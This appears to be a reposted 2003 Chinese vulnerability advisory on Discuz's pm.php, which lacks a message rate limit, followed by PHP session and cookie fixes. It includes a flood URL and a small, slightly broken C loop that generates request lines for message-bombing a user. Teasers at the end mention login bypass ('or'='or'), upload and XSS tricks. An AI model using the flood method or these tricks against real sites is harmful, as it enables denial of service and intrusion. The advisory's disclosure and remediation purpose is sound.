Discuz论坛短消息未限制发送次数漏洞

所属分类: 网络安全 / 漏洞分析 阅读数: 168
收藏 0 赞 0 分享

  涉及版本:

  目前(2003/9/21)所有免费版本(我没有商业版)

  描述:

  由于pm.php发送消息那部分代码,缺乏对时间间隔的限制。导致任何用户可以对任何用户发送消息炸弹。导致服务器空间、资源被消耗。严重可导致拒绝服务。

  具体:

  大家可以看到pm.php文件的86行的代码:

  86 } elseif($action == ’send’) {

  87

  88 if(!$pmsubmit) {

  ……

  179 showmessage(’pm_send_succeed’, ’pm.php’);

  180 }

  这部分代码没有检测用户发送短信的时间间隔限制代码。我们只要注册任意一个用户登陆后,提交:

  http://127.0.0.1/discuz/pm.php?action=send...st&message=test

  就可以轰炸angel这个用户了。提高效率的攻击方法:

  #incluse

  main()

  {

  int i;

  for(i=0;i<55933;i++)

  {

  printf("nwww.xxx.com/discuz/pm.php?action=send&pmsubmit=submit&msgto=angel&subject=test&message=test",i);

  }

  }

  编译运行file.exe >discuzpm.txt,然后把discuzpm.txt导入任何一款CGI扫描器。Run……

  防范方法:

  一,限制用户发信的间隔时间

  可以利用PHP的SESSION或者COOKIE来限制用户每次发信的间隔。处理用户发送短信时,可以选择以下两种方式区别用户是否在规定的时间内连续发送短信,假设管理员设置两次发帖时间的间隔为2分钟,看看下面两个例子:

  Cookie方式:

  if ($beforepmid) die("对不起,你两次发信的时间间隔还不到2分钟"); // $beforepmid

  前一次发信的ID

  else setcookie("beforepmid",$pmid,time()+60*2,"/","",0); // $pmid

  短信ID

  Session方式:

  session_start();

  if (session_is_registered("time") && time()-$_SESSION[’time’]<60*2)

  {

  die("对不起,你两次发帖的时间间隔还不到2分钟"); // $time 前一次发信的时间

  } else {

  $time=time();

  session_register("time");

  }

  看起来Cookie需要发送到客户端,攻击者可以删除该Cookie,好象Session比较安全些,在服务器端。不过实际上我认为应该是差不多的。因为他是连续发送,中间的间隔时间很短,来不急去删除该Cookie的。但也不排除自己编段小程序来删除Cookie。为了万全,还是使用Session吧。Session方式的文件为"session_pm.php",去掉前面的"session_"然后覆盖到Discuz目录下,记得备份原Discuz目录下的pm.php,以免出错后可以挽回。

  如果希望用Cookie的方式来防止攻击的哈,就用这个"cookie_pm.php"吧。把前面的"cookie_"去掉,然后覆盖到Discuz目录下,最好先备份Discuz目录下的pm.php文件。

  二,对于以上提高效率的攻击的防止办法

  将第86行后加入以下代码

  $pmsubmit=$_POST[’pmsubmit’];

  $msgto=$_POST[’msgto’];

  $subject=$_POST[’subject’];

  $message=$_POST[’message’];

  OK,这下上面所说的的高效攻击方法失效了。

  最后,付上两个修改好的pm.php文件(http://www.4ngel.net/img/pm.rar)。一个为cookie方式,一个为session方式。如果你是直接使用上面文件中的一样,请将文件名改为pm.php然后在覆盖到discuz目录下,再进入管理远后台的:界面风格->模板套系

  下编辑:Discuz! 语言包 下的 templates 选项。搜索"pm_box_isfull",把

  ’pm_box_isfull’ => ’您的信箱已满,在阅读短消息前必须删除一些不用的信息。’,

  改为以下内容:

  ’pm_box_isfull’ => ’您的信箱已满,在阅读短消息前必须删除一些不用的信息。’,

  ’pm_send_partition’ => ’对不起,你两次发信的时间间隔还不到2分钟。’,

  ’pm_nonexistence’ => ’对不起,短消息不存在或已被删除。’

  特别感谢金玄网(http://www.gixuan.net)的金玄给予大力的支持和帮助。其实discuz论坛还是个未成熟的论坛。还有一些大大小小的漏洞。希望开发者们能注意。

 

 

(本文由责任编辑 pasu 整理发布)

 

更多精彩内容其他人还在看

织梦管理系统后台查找

  有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。   这个时候 大家可以尝试下在地址后面加上:/include/dialog/select_media.php?f=form1.murl   但不一定通杀。。  
收藏 0 赞 0 分享

ckeditor/DesignCms上传漏洞

  今天日站发现的....   http://www.xxx.net/manage/Modle/UploadFile/ListFiles.aspx 上传洞洞   上传后没改文件名!可以IIS解析   后面的事,你懂的~   有点像FCK ...   我晕了...这程式漏洞真多  
收藏 0 赞 0 分享

DedeCmsV5.6 本地包含又一利用方式

  续本地包含   include/arc.datalist.class.php   $codefile = (isset($needCode) ? $needCode : $cfg_soft_lang);   if(file_exists(DEDEINC.'/code/data
收藏 0 赞 0 分享

phpcms V9 BLind SQL 注入漏洞0day

  影响版本:phpcms v9 blind  phpcms v9 blind 参数过滤存在SQL注入漏洞。
收藏 0 赞 0 分享

AWBS 2.9.2 Blind SQL 注入0day

AWBS 2.9.2 Blind SQL 注入0day,大家可以参考下。
收藏 0 赞 0 分享

金山毒霸多个sql注入及XSS漏洞和修复

金山毒霸多个sql注入及XSS漏洞和修复,需要的朋友可以参考下。
收藏 0 赞 0 分享

Zblog最新跨站漏洞及利用代码

Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向
收藏 0 赞 0 分享

xyxcms v1.3 小游戏CMS 漏洞说明

国内最专业的ASP网站内容管理系统-小游戏管理系统,他将是您轻松建站的首选利器。挺好的一个系统,就是有点小问题,大家可以修改下。
收藏 0 赞 0 分享

Discuz X1.5 用不到 Gmail SSL SMTP

前天 16:50 上传 下载附件 (34.22 KB) ,窃听器哪里有卖 设置如上,车辆跟踪器,登入 username 及 password 都再三确认 但用「检测」就弹出以下错误 前天 16:50 上传 下载附件 (12.73 KB) 请问
收藏 0 赞 0 分享

万能密码漏洞以及修复

  万能密码漏洞以及修复   记得几年前要入侵一个企业网站超级简单   一般只需要找到后台 还有后台通常是www.xxx.com/admin/   然后账号 密码都是'or'='or' 就进去   现在好像有几个也可以用 但是已经没那么普及了   如果网站还出现这种“
收藏 0 赞 0 分享
查看更多